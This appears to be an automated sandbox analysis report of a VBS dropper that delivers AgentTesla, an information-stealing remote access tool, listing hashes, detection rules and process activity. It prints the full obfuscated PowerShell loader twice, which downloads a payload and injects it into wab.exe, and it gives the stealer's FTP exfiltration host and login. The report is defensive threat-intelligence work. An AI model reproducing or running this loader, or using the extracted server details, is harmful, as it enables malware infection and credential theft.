Analysis
-
max time kernel
147s -
max time network
145s -
platform
windows7_x64 -
resource
win7-20240215-en -
resource tags
arch:x64arch:x86image:win7-20240215-enlocale:en-usos:windows7-x64system -
submitted
27-04-2024 01:31
Static task
static1
Behavioral task
behavioral1
Sample
94ffc7bec0cef06550d739bc5014a3232c9218a50524de0464b53b6dbbd7ed5f.vbs
Resource
win7-20240215-en
Behavioral task
behavioral2
Sample
94ffc7bec0cef06550d739bc5014a3232c9218a50524de0464b53b6dbbd7ed5f.vbs
Resource
win10v2004-20240426-en
General
-
Target
94ffc7bec0cef06550d739bc5014a3232c9218a50524de0464b53b6dbbd7ed5f.vbs
-
Size
59KB
-
MD5
3c00879a0e4e4a7d7b78bb8611bcc94f
-
SHA1
3ddd2f54b7fb54df60134318515fd61b119bc46f
-
SHA256
94ffc7bec0cef06550d739bc5014a3232c9218a50524de0464b53b6dbbd7ed5f
-
SHA512
4dfce826cf9f7456dd981b4a1b4c985d75c9c849434a94c5987bd08fe037217b5160441e23072c498b5e9c93e2d00d8c6e814ea1736e68724aa461881ab1b31c
-
SSDEEP
1536:cdukLI1gPDPTxyk0MfFCNqnlAEfen8TCQr:Yukk1gPDJzoGaEWn8Tv
Malware Config
Extracted
agenttesla
Protocol: ftp- Host:
ftp://ftp.concaribe.com - Port:
21 - Username:
[email protected] - Password:
2ogFj^8ECV(?
Signatures
-
AgentTesla
Agent Tesla is a remote access tool (RAT) written in visual basic.
-
Detect packed .NET executables. Mostly AgentTeslaV4. 2 IoCs
Processes:
resource yara_rule behavioral1/memory/2768-30-0x0000000000A90000-0x0000000001AF2000-memory.dmp INDICATOR_EXE_Packed_GEN01 behavioral1/memory/2768-31-0x0000000000A90000-0x0000000000AD2000-memory.dmp INDICATOR_EXE_Packed_GEN01 -
Detects binaries (Windows and macOS) referencing many web browsers. Observed in information stealers. 2 IoCs
Processes:
resource yara_rule behavioral1/memory/2768-30-0x0000000000A90000-0x0000000001AF2000-memory.dmp INDICATOR_SUSPICIOUS_Binary_References_Browsers behavioral1/memory/2768-31-0x0000000000A90000-0x0000000000AD2000-memory.dmp INDICATOR_SUSPICIOUS_Binary_References_Browsers -
Detects executables referencing Windows vault credential objects. Observed in infostealers 2 IoCs
Processes:
resource yara_rule behavioral1/memory/2768-30-0x0000000000A90000-0x0000000001AF2000-memory.dmp INDICATOR_SUSPICIOUS_EXE_VaultSchemaGUID behavioral1/memory/2768-31-0x0000000000A90000-0x0000000000AD2000-memory.dmp INDICATOR_SUSPICIOUS_EXE_VaultSchemaGUID -
Detects executables referencing many confidential data stores found in browsers, mail clients, cryptocurreny wallets, etc. Observed in information stealers 2 IoCs
Processes:
resource yara_rule behavioral1/memory/2768-30-0x0000000000A90000-0x0000000001AF2000-memory.dmp INDICATOR_SUSPICIOUS_EXE_References_Confidential_Data_Store behavioral1/memory/2768-31-0x0000000000A90000-0x0000000000AD2000-memory.dmp INDICATOR_SUSPICIOUS_EXE_References_Confidential_Data_Store -
Detects executables referencing many email and collaboration clients. Observed in information stealers 2 IoCs
Processes:
resource yara_rule behavioral1/memory/2768-30-0x0000000000A90000-0x0000000001AF2000-memory.dmp INDICATOR_SUSPICIOUS_EXE_References_Messaging_Clients behavioral1/memory/2768-31-0x0000000000A90000-0x0000000000AD2000-memory.dmp INDICATOR_SUSPICIOUS_EXE_References_Messaging_Clients -
Detects executables referencing many file transfer clients. Observed in information stealers 2 IoCs
Processes:
resource yara_rule behavioral1/memory/2768-30-0x0000000000A90000-0x0000000001AF2000-memory.dmp INDICATOR_SUSPICIOUS_EXE_Referenfces_File_Transfer_Clients behavioral1/memory/2768-31-0x0000000000A90000-0x0000000000AD2000-memory.dmp INDICATOR_SUSPICIOUS_EXE_Referenfces_File_Transfer_Clients -
Blocklisted process makes network request 2 IoCs
Processes:
WScript.exepowershell.exeflow pid process 2 2328 WScript.exe 8 2788 powershell.exe -
Looks up external IP address via web service 2 IoCs
Uses a legitimate IP lookup service to find the infected system's external IP.
Processes:
flow ioc 11 api.ipify.org 12 api.ipify.org -
Suspicious use of NtCreateThreadExHideFromDebugger 1 IoCs
Processes:
wab.exepid process 2768 wab.exe -
Suspicious use of NtSetInformationThreadHideFromDebugger 2 IoCs
Processes:
powershell.exewab.exepid process 304 powershell.exe 2768 wab.exe -
Suspicious use of SetThreadContext 1 IoCs
Processes:
powershell.exedescription pid process target process PID 304 set thread context of 2768 304 powershell.exe wab.exe -
Runs ping.exe 1 TTPs 2 IoCs
-
Suspicious behavior: EnumeratesProcesses 5 IoCs
Processes:
powershell.exepowershell.exewab.exepid process 2788 powershell.exe 304 powershell.exe 304 powershell.exe 2768 wab.exe 2768 wab.exe -
Suspicious behavior: MapViewOfSection 1 IoCs
Processes:
powershell.exepid process 304 powershell.exe -
Suspicious use of AdjustPrivilegeToken 3 IoCs
Processes:
powershell.exepowershell.exewab.exedescription pid process Token: SeDebugPrivilege 2788 powershell.exe Token: SeDebugPrivilege 304 powershell.exe Token: SeDebugPrivilege 2768 wab.exe -
Suspicious use of WriteProcessMemory 29 IoCs
Processes:
WScript.exepowershell.exepowershell.exedescription pid process target process PID 2328 wrote to memory of 2572 2328 WScript.exe ping.exe PID 2328 wrote to memory of 2572 2328 WScript.exe ping.exe PID 2328 wrote to memory of 2572 2328 WScript.exe ping.exe PID 2328 wrote to memory of 2724 2328 WScript.exe ping.exe PID 2328 wrote to memory of 2724 2328 WScript.exe ping.exe PID 2328 wrote to memory of 2724 2328 WScript.exe ping.exe PID 2328 wrote to memory of 2756 2328 WScript.exe cmd.exe PID 2328 wrote to memory of 2756 2328 WScript.exe cmd.exe PID 2328 wrote to memory of 2756 2328 WScript.exe cmd.exe PID 2328 wrote to memory of 2788 2328 WScript.exe powershell.exe PID 2328 wrote to memory of 2788 2328 WScript.exe powershell.exe PID 2328 wrote to memory of 2788 2328 WScript.exe powershell.exe PID 2788 wrote to memory of 2480 2788 powershell.exe cmd.exe PID 2788 wrote to memory of 2480 2788 powershell.exe cmd.exe PID 2788 wrote to memory of 2480 2788 powershell.exe cmd.exe PID 2788 wrote to memory of 304 2788 powershell.exe powershell.exe PID 2788 wrote to memory of 304 2788 powershell.exe powershell.exe PID 2788 wrote to memory of 304 2788 powershell.exe powershell.exe PID 2788 wrote to memory of 304 2788 powershell.exe powershell.exe PID 304 wrote to memory of 2828 304 powershell.exe cmd.exe PID 304 wrote to memory of 2828 304 powershell.exe cmd.exe PID 304 wrote to memory of 2828 304 powershell.exe cmd.exe PID 304 wrote to memory of 2828 304 powershell.exe cmd.exe PID 304 wrote to memory of 2768 304 powershell.exe wab.exe PID 304 wrote to memory of 2768 304 powershell.exe wab.exe PID 304 wrote to memory of 2768 304 powershell.exe wab.exe PID 304 wrote to memory of 2768 304 powershell.exe wab.exe PID 304 wrote to memory of 2768 304 powershell.exe wab.exe PID 304 wrote to memory of 2768 304 powershell.exe wab.exe
Processes
-
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\94ffc7bec0cef06550d739bc5014a3232c9218a50524de0464b53b6dbbd7ed5f.vbs"1⤵
- Blocklisted process makes network request
- Suspicious use of WriteProcessMemory
-
C:\Windows\System32\ping.exeping google.com -n 12⤵
- Runs ping.exe
-
C:\Windows\System32\ping.exeping %.%.%.%2⤵
- Runs ping.exe
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c dir2⤵
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "$Dragonwort = 1;$Vad='Substrin';$Vad+='g';Function Forfatterskaberne($Honnren){$Naeppe=$Honnren.Length-$Dragonwort;For($Tyndhudet=5; $Tyndhudet -lt $Naeppe; $Tyndhudet+=(6)){$Anticipants+=$Honnren.$Vad.Invoke($Tyndhudet, $Dragonwort);}$Anticipants;}function Flelsessagers167($baitfish){. ($Statsls) ($baitfish);}$Noncritical84=Forfatterskaberne 'Ni.roM D mmoGaasezBrandi N.dklFrokolMercaaSiv.n/Ensw.5Glaci. Berm0Nring Teate(ArntpWKnickiDkninnPlessdDeducoRepetwmahonsC vil KilowNP omoT,adly Sejse1Forlg0Klond.Menya0Paata;Cosse SorteW C.rei,urkin sade6P,tel4Stoni;Bysba Lettex C no6 Folk4Adhak;Fis,i weedrAabenv Voks:Capan1Res z2Nonpo1 Wird.Dront0Hasse) Inte VauntGStikle.evercVemodkErhveoNeogr/Praef2Forep0A dem1Val,i0 Held0Takt.1Nontr0R,gne1slbsa ParagFJenviiClearrRigore rullfCircuoLid oxSymme/ Band1Amfib2sho p1Minds.L.est0Tude. ';$Systemgrafs=Forfatterskaberne 'ErnriU D scs KunseA tiqrPolit-tjavsA SpndgtaxieeS.bvenArabet Dece ';$Bewhite=Forfatterskaberne 'EndanhWadmat Illat annap Gyre:Delig/ Unfl/B mbanElbiliRateft in eiDtrenoArkol. .nurcord.noRestamShoeb/ K,erk Supe2Komma/BregoUHandenWaterc ForwoPoindnshrafsPancrc.iffsiBrydne Convn.utsutPulloiJomfroUningu LodgsToolmn.etaleSpilfsVittus Gunv.Conc.jSamvrp.nddkbEndoc ';$Foelsomhed=Forfatterskaberne 'Extra>Alkoh ';$Statsls=Forfatterskaberne 'Re,nui KandeHust.x.indu ';$Soil='Bureaucratizes';Flelsessagers167 (Forfatterskaberne 'SuperSThroue Bl atEneka-Unde.CSavtaoBibl.n UbiqtRedekeEnkeln ucert Lime Has,e-forbuPkludra AdvotminimhSpl.t Mu.tiTNvnin:Kan.n\ ommeAIdeoln Pewet.jlleiAbdietNedkuyDorsipBeclio PissuBrystsImmob.MelletAlactxB nzetOverp Misfo- CincV lupuaUltralTre.muNum.eeUnive Ign,t$ uskuSmelano gleri UndelSume.; Na,u ');Flelsessagers167 (Forfatterskaberne 'MetafiMaskif Sheo Smaa(GerbrtRaneeeAcquisNitritD.mme-DivispstewaaShooptAmt fhButtl BoxinTBioxa: Gr n\futurAEthionKorrotLdervi LengtStor,y,arvepSyneroSmrreuKiwifsWebbe.Papagtendowxmisfot Citr)Hoved{ RedseDextrxtrachiTrochtDrnle}.ctor;Benda ');$Plumipede107 = Forfatterskaberne ' OmsteSqsamcTone.hLodlioProli Hvnen%snksmaUnexapDumstpRigsmdCo ntaRenipt FrigaHanke% Smil\ B.rdVKa.meeSe sur Uhe.eBranddHippoiMbirac Bildt.eget.Unprem RegiocoleouTroll S gte&Afkry&Magia F.odeNatioc N.nphPulpioPreco ulli$ Deod ';Flelsessagers167 (Forfatterskaberne 'Coe o$Inchag AsaflTriumoTrettbUngraa urfl Alun:ThaniHTab reskar,arosarrSpaentGeot.gKontrr Vrt i DyrseStoddfFakul=Dagge( Te,ecJaspimSkat,dBeeth Udst./Pr.srcOverh Dees$ OpspPAf.ikl FireuArsenmVksthinukesp Dexte DebwdAntere,rocn1Fortn0Print7Stila) .nds ');Flelsessagers167 (Forfatterskaberne ' U kr$ Vagtg TalllMagniodis.ebStockaRet.rlPseud: arisJBarder,eskfeShan nMand,= lanc$SwowmB St feUnderwBl myhmarduiT.avstCharyeCatar.KontasVildfpNaganl ggesiAle.atIndsn(No eq$PrebeFUmiacoDyk,eekonfolBlacksNordvoKolormDiscohScolee Linnd Fabr)Semig ');$Bewhite=$Jren[0];Flelsessagers167 (Forfatterskaberne 'Lokal$StrmfgUsurplWay,ioForhab mdiraHovedlOverd:Pa,peRTrakkeEr,antSubhes KampsMatchi CohokMumpikSkibseR.tirrInforhNonfeeBarled Recoe.rescnBe oos Un,e=FunicN SknneAllydwCushb-HaandONomeub ToiljV dneeJokercPorthtAphon enthrSRadixySuttes,nsubtTerateEuropmL,ndl.AutenN .rubeLamedt,etfi.Lap.aW Fr teSvmmebNedsvC DelilOm leiAcclieMareknInkast,nter ');Flelsessagers167 (Forfatterskaberne 'Bu im$TraveRBarfoe HodotImpacsO,isssTrbesidrikkk .nenkLondieE,terrFr,mbhOptraeStududK yose Da.anSm rosHete..JobsgHBaggreUnperaReinad Laere SerorDybfrswe,tb[Sprud$CoregSBri,hy,odessKnkketTryl e Cheem Phy,gLok.er ,lluaintegfTradis Alge]Unde,=Epina$UnsepNla ceoSum.onReveicMilierF.uori ommtKalifiVibr c U ifa UdpelChor.8 Eksp4Musel ');$Bakteriologierne=Forfatterskaberne 'IodhyRTrnereschn tBoucls tebastol,mi Retsku.remk PseueDialyrPo,olhLar.seCre.edStorteLim enRu,anssplit.udsmuDwarpooParn,wInsatnTjrehlCruseoOutraaNidi,dByforFHunkniUsy,llDom,meStoma(Forst$GenfoBPirojeOverrwAktivhTrindi Al.rtBllere Trou,Pupp,$ WeinsKin su QuidbE,cinjUnr.me Ag icCal ptSy thiBoo.hoAv,can efisBla,t)Unaus ';$Bakteriologierne=$Heartgrief[1]+$Bakteriologierne;$subjections=$Heartgrief[0];Flelsessagers167 (Forfatterskaberne ' Unva$Clam,gnormklGataao DekobdrninaInsiplPlect:Stym EAdfrdl VaresIchthaDrnfa= klub( Mil T Ci,ieTabansIndh,tSmuds-BrudnPGangwaStubmtGimpihDystr Comp$TelessSydgau Tranb,hospjLev.veManufc SqustVasociElecto ravenBregnsD,kke)Arbej ');while (!$Elsa) {Flelsessagers167 (Forfatterskaberne 'Si us$LyssigPulerlKlupuoVexi.bAntheaCyanolR fle:MargeN PhotoBehann .recbPowdeaTud,ksExceriEft,rnMarcigDatak3Trold5Rette=Brevf$ParoctknuserAmat,uConsteT ivi ') ;Flelsessagers167 $Bakteriologierne;Flelsessagers167 (Forfatterskaberne 'FatniS.yroatMargeao.thorSkoletDegre-stockSHu.knlShamee PotaeLsepepHo ed A,tst4Ta.ov ');Flelsessagers167 (Forfatterskaberne 'Hyb i$Denigg PerclForsvoRec,obUnodoa Dr mlReobl:malleE,ntihlS.rsosRutefaCarfa=nytes(FuldfTPhotoeEug,esR,kistAnr.t- DetrP,recoaOdon t GavshCo,ed Egmu $GormasRigs.uTilrabaglosj ArbeeStde.cBiogetKalkuiGilbeoLegemnDi,gosfusio)walis ') ;Flelsessagers167 (Forfatterskaberne ' iffe$ T.nngVkkeul Fibeo NaevbGaincaSy,telfesta:OverbF Pip,oValgfrmontelKultiyThysag StiltKnipleSprosrenga.n Tr meDelussHde s= Ence$DemisgR caglFarseoPartrbEthe.aBeaanldross:SurveVSp jdieditetTeddceRosvrlPolarlHyperaZuniarOv rci Di.tuPedotmTrumf8Bra.n9 Fert+Homil+Boate%Uter.$Hy erJFall,rBo,gie BrownWood .NonercVergeoParasuSeas nDubiotnedga ') ;$Bewhite=$Jren[$Forlygternes];}Flelsessagers167 (Forfatterskaberne ' Ra.e$Adolfg DruplVid oo jamabOplsfa,wvenl Naug:roofyfS,ercj WidieAn.jalTattidKol.i Hj.mm= Hair UnicoG Smaae tasstDr.ft-cren.CPartioAreeln WaxwtNona.eSammen.nwratEm,ti Tusch$TamelsS,rikuAtt nbPodsojHeathekommacAccentMisapi OphaoGenglnDruses irke ');Flelsessagers167 (Forfatterskaberne 'Kardi$BarspgFactol HypooF,skebWim,laAwr slKarlj:UnperI OptrmCosmomdukavaBizartNotearAfsigiLnpotk,aleauoppakl.lufseForurr ArnaiProrinProstgForbeeBedrerExter Dekon=.nnih Luzul[MotorSC.rsty,ments ProttM,kroe R stmlokal.ScythCBascioRibbenGengivEks,le .istr PrmitUnrec]Rubbi: pern:Ank.rFSolhar AcicoAndelmS,parBCremea TownsProceeLi,en6Undli4SlagsSPantstFd elrUnhomi.ectan ,enigAer n(primr$ KejsfByggrjHu oreProcolProjedUtopi)C ffe ');Flelsessagers167 (Forfatterskaberne 'Empye$,onpegGaunclQui,do AcarbKnip,aVoliplSejoi:HomunRConsueR sprcCam hoAu.itnResurtIdkoreStranmFerripAdrielunfraaLabeltUnd,riForgroForbrnMonop Flo,e= prea Subpe[CancrS UkrnyTithasHexamt iodee ForpmVselm.PinewTPondeeStagnxBreittFi,mo.KoppeEBromfnVve,ecExpenoBr,stdHushoiRapson Progg Regi]Supe.: Kolo:SeverAOilmoSMisi CV.locIs,iseIKn ge.PusseGPupate efeat SeklSSystet,peakrClituiIndren Ins.gPercu( Fors$SelvmI.entrm,arvemPolaraM.ndst,forgr Ajugi CacokKatodu Narrl RowleImperrUrpreiStagin Mod gBarnae yriarVrdig)Pimpl ');Flelsessagers167 (Forfatterskaberne 'Empir$Id,lsgMiljalBes.loVed.abPedi.a PaaflFrimu:AlecttGldspoUpstrnPrl,daZoogerNon,ut .ffie DistrStu,in ReareKmmen=,allo$NringRLaidle U.frc B fro oelnHypnotOmkrae R.hamKybelpCr.stlBlawnarepubtLingui ovioS,ijonF.yve. IdrisStemnuMora,bPallasfaithtWeekerPree,iSansenDilatg Form( Grns3Klink0Tyrek1.rveg7.rede8 Emul5.atto,ins e2Slupp8.avvr7 mbit4 K.nt7 cypr)Ov,rs ');Flelsessagers167 $tonarterne;"2⤵
- Blocklisted process makes network request
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\cmd.exe"C:\Windows\system32\cmd.exe" /c "echo %appdata%\Veredict.mou && echo $"3⤵
-
C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe" "$Dragonwort = 1;$Vad='Substrin';$Vad+='g';Function Forfatterskaberne($Honnren){$Naeppe=$Honnren.Length-$Dragonwort;For($Tyndhudet=5; $Tyndhudet -lt $Naeppe; $Tyndhudet+=(6)){$Anticipants+=$Honnren.$Vad.Invoke($Tyndhudet, $Dragonwort);}$Anticipants;}function Flelsessagers167($baitfish){. ($Statsls) ($baitfish);}$Noncritical84=Forfatterskaberne 'Ni.roM D mmoGaasezBrandi N.dklFrokolMercaaSiv.n/Ensw.5Glaci. Berm0Nring Teate(ArntpWKnickiDkninnPlessdDeducoRepetwmahonsC vil KilowNP omoT,adly Sejse1Forlg0Klond.Menya0Paata;Cosse SorteW C.rei,urkin sade6P,tel4Stoni;Bysba Lettex C no6 Folk4Adhak;Fis,i weedrAabenv Voks:Capan1Res z2Nonpo1 Wird.Dront0Hasse) Inte VauntGStikle.evercVemodkErhveoNeogr/Praef2Forep0A dem1Val,i0 Held0Takt.1Nontr0R,gne1slbsa ParagFJenviiClearrRigore rullfCircuoLid oxSymme/ Band1Amfib2sho p1Minds.L.est0Tude. ';$Systemgrafs=Forfatterskaberne 'ErnriU D scs KunseA tiqrPolit-tjavsA SpndgtaxieeS.bvenArabet Dece ';$Bewhite=Forfatterskaberne 'EndanhWadmat Illat annap Gyre:Delig/ Unfl/B mbanElbiliRateft in eiDtrenoArkol. .nurcord.noRestamShoeb/ K,erk Supe2Komma/BregoUHandenWaterc ForwoPoindnshrafsPancrc.iffsiBrydne Convn.utsutPulloiJomfroUningu LodgsToolmn.etaleSpilfsVittus Gunv.Conc.jSamvrp.nddkbEndoc ';$Foelsomhed=Forfatterskaberne 'Extra>Alkoh ';$Statsls=Forfatterskaberne 'Re,nui KandeHust.x.indu ';$Soil='Bureaucratizes';Flelsessagers167 (Forfatterskaberne 'SuperSThroue Bl atEneka-Unde.CSavtaoBibl.n UbiqtRedekeEnkeln ucert Lime Has,e-forbuPkludra AdvotminimhSpl.t Mu.tiTNvnin:Kan.n\ ommeAIdeoln Pewet.jlleiAbdietNedkuyDorsipBeclio PissuBrystsImmob.MelletAlactxB nzetOverp Misfo- CincV lupuaUltralTre.muNum.eeUnive Ign,t$ uskuSmelano gleri UndelSume.; Na,u ');Flelsessagers167 (Forfatterskaberne 'MetafiMaskif Sheo Smaa(GerbrtRaneeeAcquisNitritD.mme-DivispstewaaShooptAmt fhButtl BoxinTBioxa: Gr n\futurAEthionKorrotLdervi LengtStor,y,arvepSyneroSmrreuKiwifsWebbe.Papagtendowxmisfot Citr)Hoved{ RedseDextrxtrachiTrochtDrnle}.ctor;Benda ');$Plumipede107 = Forfatterskaberne ' OmsteSqsamcTone.hLodlioProli Hvnen%snksmaUnexapDumstpRigsmdCo ntaRenipt FrigaHanke% Smil\ B.rdVKa.meeSe sur Uhe.eBranddHippoiMbirac Bildt.eget.Unprem RegiocoleouTroll S gte&Afkry&Magia F.odeNatioc N.nphPulpioPreco ulli$ Deod ';Flelsessagers167 (Forfatterskaberne 'Coe o$Inchag AsaflTriumoTrettbUngraa urfl Alun:ThaniHTab reskar,arosarrSpaentGeot.gKontrr Vrt i DyrseStoddfFakul=Dagge( Te,ecJaspimSkat,dBeeth Udst./Pr.srcOverh Dees$ OpspPAf.ikl FireuArsenmVksthinukesp Dexte DebwdAntere,rocn1Fortn0Print7Stila) .nds ');Flelsessagers167 (Forfatterskaberne ' U kr$ Vagtg TalllMagniodis.ebStockaRet.rlPseud: arisJBarder,eskfeShan nMand,= lanc$SwowmB St feUnderwBl myhmarduiT.avstCharyeCatar.KontasVildfpNaganl ggesiAle.atIndsn(No eq$PrebeFUmiacoDyk,eekonfolBlacksNordvoKolormDiscohScolee Linnd Fabr)Semig ');$Bewhite=$Jren[0];Flelsessagers167 (Forfatterskaberne 'Lokal$StrmfgUsurplWay,ioForhab mdiraHovedlOverd:Pa,peRTrakkeEr,antSubhes KampsMatchi CohokMumpikSkibseR.tirrInforhNonfeeBarled Recoe.rescnBe oos Un,e=FunicN SknneAllydwCushb-HaandONomeub ToiljV dneeJokercPorthtAphon enthrSRadixySuttes,nsubtTerateEuropmL,ndl.AutenN .rubeLamedt,etfi.Lap.aW Fr teSvmmebNedsvC DelilOm leiAcclieMareknInkast,nter ');Flelsessagers167 (Forfatterskaberne 'Bu im$TraveRBarfoe HodotImpacsO,isssTrbesidrikkk .nenkLondieE,terrFr,mbhOptraeStududK yose Da.anSm rosHete..JobsgHBaggreUnperaReinad Laere SerorDybfrswe,tb[Sprud$CoregSBri,hy,odessKnkketTryl e Cheem Phy,gLok.er ,lluaintegfTradis Alge]Unde,=Epina$UnsepNla ceoSum.onReveicMilierF.uori ommtKalifiVibr c U ifa UdpelChor.8 Eksp4Musel ');$Bakteriologierne=Forfatterskaberne 'IodhyRTrnereschn tBoucls tebastol,mi Retsku.remk PseueDialyrPo,olhLar.seCre.edStorteLim enRu,anssplit.udsmuDwarpooParn,wInsatnTjrehlCruseoOutraaNidi,dByforFHunkniUsy,llDom,meStoma(Forst$GenfoBPirojeOverrwAktivhTrindi Al.rtBllere Trou,Pupp,$ WeinsKin su QuidbE,cinjUnr.me Ag icCal ptSy thiBoo.hoAv,can efisBla,t)Unaus ';$Bakteriologierne=$Heartgrief[1]+$Bakteriologierne;$subjections=$Heartgrief[0];Flelsessagers167 (Forfatterskaberne ' Unva$Clam,gnormklGataao DekobdrninaInsiplPlect:Stym EAdfrdl VaresIchthaDrnfa= klub( Mil T Ci,ieTabansIndh,tSmuds-BrudnPGangwaStubmtGimpihDystr Comp$TelessSydgau Tranb,hospjLev.veManufc SqustVasociElecto ravenBregnsD,kke)Arbej ');while (!$Elsa) {Flelsessagers167 (Forfatterskaberne 'Si us$LyssigPulerlKlupuoVexi.bAntheaCyanolR fle:MargeN PhotoBehann .recbPowdeaTud,ksExceriEft,rnMarcigDatak3Trold5Rette=Brevf$ParoctknuserAmat,uConsteT ivi ') ;Flelsessagers167 $Bakteriologierne;Flelsessagers167 (Forfatterskaberne 'FatniS.yroatMargeao.thorSkoletDegre-stockSHu.knlShamee PotaeLsepepHo ed A,tst4Ta.ov ');Flelsessagers167 (Forfatterskaberne 'Hyb i$Denigg PerclForsvoRec,obUnodoa Dr mlReobl:malleE,ntihlS.rsosRutefaCarfa=nytes(FuldfTPhotoeEug,esR,kistAnr.t- DetrP,recoaOdon t GavshCo,ed Egmu $GormasRigs.uTilrabaglosj ArbeeStde.cBiogetKalkuiGilbeoLegemnDi,gosfusio)walis ') ;Flelsessagers167 (Forfatterskaberne ' iffe$ T.nngVkkeul Fibeo NaevbGaincaSy,telfesta:OverbF Pip,oValgfrmontelKultiyThysag StiltKnipleSprosrenga.n Tr meDelussHde s= Ence$DemisgR caglFarseoPartrbEthe.aBeaanldross:SurveVSp jdieditetTeddceRosvrlPolarlHyperaZuniarOv rci Di.tuPedotmTrumf8Bra.n9 Fert+Homil+Boate%Uter.$Hy erJFall,rBo,gie BrownWood .NonercVergeoParasuSeas nDubiotnedga ') ;$Bewhite=$Jren[$Forlygternes];}Flelsessagers167 (Forfatterskaberne ' Ra.e$Adolfg DruplVid oo jamabOplsfa,wvenl Naug:roofyfS,ercj WidieAn.jalTattidKol.i Hj.mm= Hair UnicoG Smaae tasstDr.ft-cren.CPartioAreeln WaxwtNona.eSammen.nwratEm,ti Tusch$TamelsS,rikuAtt nbPodsojHeathekommacAccentMisapi OphaoGenglnDruses irke ');Flelsessagers167 (Forfatterskaberne 'Kardi$BarspgFactol HypooF,skebWim,laAwr slKarlj:UnperI OptrmCosmomdukavaBizartNotearAfsigiLnpotk,aleauoppakl.lufseForurr ArnaiProrinProstgForbeeBedrerExter Dekon=.nnih Luzul[MotorSC.rsty,ments ProttM,kroe R stmlokal.ScythCBascioRibbenGengivEks,le .istr PrmitUnrec]Rubbi: pern:Ank.rFSolhar AcicoAndelmS,parBCremea TownsProceeLi,en6Undli4SlagsSPantstFd elrUnhomi.ectan ,enigAer n(primr$ KejsfByggrjHu oreProcolProjedUtopi)C ffe ');Flelsessagers167 (Forfatterskaberne 'Empye$,onpegGaunclQui,do AcarbKnip,aVoliplSejoi:HomunRConsueR sprcCam hoAu.itnResurtIdkoreStranmFerripAdrielunfraaLabeltUnd,riForgroForbrnMonop Flo,e= prea Subpe[CancrS UkrnyTithasHexamt iodee ForpmVselm.PinewTPondeeStagnxBreittFi,mo.KoppeEBromfnVve,ecExpenoBr,stdHushoiRapson Progg Regi]Supe.: Kolo:SeverAOilmoSMisi CV.locIs,iseIKn ge.PusseGPupate efeat SeklSSystet,peakrClituiIndren Ins.gPercu( Fors$SelvmI.entrm,arvemPolaraM.ndst,forgr Ajugi CacokKatodu Narrl RowleImperrUrpreiStagin Mod gBarnae yriarVrdig)Pimpl ');Flelsessagers167 (Forfatterskaberne 'Empir$Id,lsgMiljalBes.loVed.abPedi.a PaaflFrimu:AlecttGldspoUpstrnPrl,daZoogerNon,ut .ffie DistrStu,in ReareKmmen=,allo$NringRLaidle U.frc B fro oelnHypnotOmkrae R.hamKybelpCr.stlBlawnarepubtLingui ovioS,ijonF.yve. IdrisStemnuMora,bPallasfaithtWeekerPree,iSansenDilatg Form( Grns3Klink0Tyrek1.rveg7.rede8 Emul5.atto,ins e2Slupp8.avvr7 mbit4 K.nt7 cypr)Ov,rs ');Flelsessagers167 $tonarterne;"3⤵
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Suspicious use of SetThreadContext
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: MapViewOfSection
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\system32\cmd.exe" /c "echo %appdata%\Veredict.mou && echo $"4⤵
-
C:\Program Files (x86)\windows mail\wab.exe"C:\Program Files (x86)\windows mail\wab.exe"4⤵
- Suspicious use of NtCreateThreadExHideFromDebugger
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
Network
MITRE ATT&CK Matrix ATT&CK v13
Replay Monitor
Loading Replay Monitor...
Downloads
-
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\0YC7I603DGQVOI0QIBSA.tempFilesize
7KB
MD5d6990a2ece84f10c60d8380e4bdd0343
SHA12fcd81a302d88cc2df1e6d2ebe5f30812bc320cf
SHA2569013014be269e5cce493b501892b621356fe0fa7890feeb031ed5839b6b0d9d9
SHA512991fc474d330cd6e450777b13a785acf587b56b9103974c38d86aa29942416bacca4dc33265ceaf6de59a041a0f0bce8a5b2320190e9361c09257b8c06960ede
-
C:\Users\Admin\AppData\Roaming\Veredict.mouFilesize
430KB
MD5446bd53386a67b6e402c67f8077b3a9e
SHA111d006e1c77dddfff4559bef35ec15bd01fb8cbc
SHA25685f74a4e42fd58c712bfce653b8eb1d71c57793e22daf9529c7c916c4660dfc4
SHA5121afae58e5cbedc6c2aaa7779bb9217f1cf00aff240a9bdbdc41394a30cc1bd59181a83c8fd62fb636d34b0be41cb8a277c64c9126d52881324cbcff27753e838
-
memory/304-28-0x00000000064E0000-0x000000000A80F000-memory.dmpFilesize
67.2MB
-
memory/2768-30-0x0000000000A90000-0x0000000001AF2000-memory.dmpFilesize
16.4MB
-
memory/2768-31-0x0000000000A90000-0x0000000000AD2000-memory.dmpFilesize
264KB
-
memory/2788-22-0x0000000001D20000-0x0000000001D28000-memory.dmpFilesize
32KB
-
memory/2788-21-0x000000001B7D0000-0x000000001BAB2000-memory.dmpFilesize
2.9MB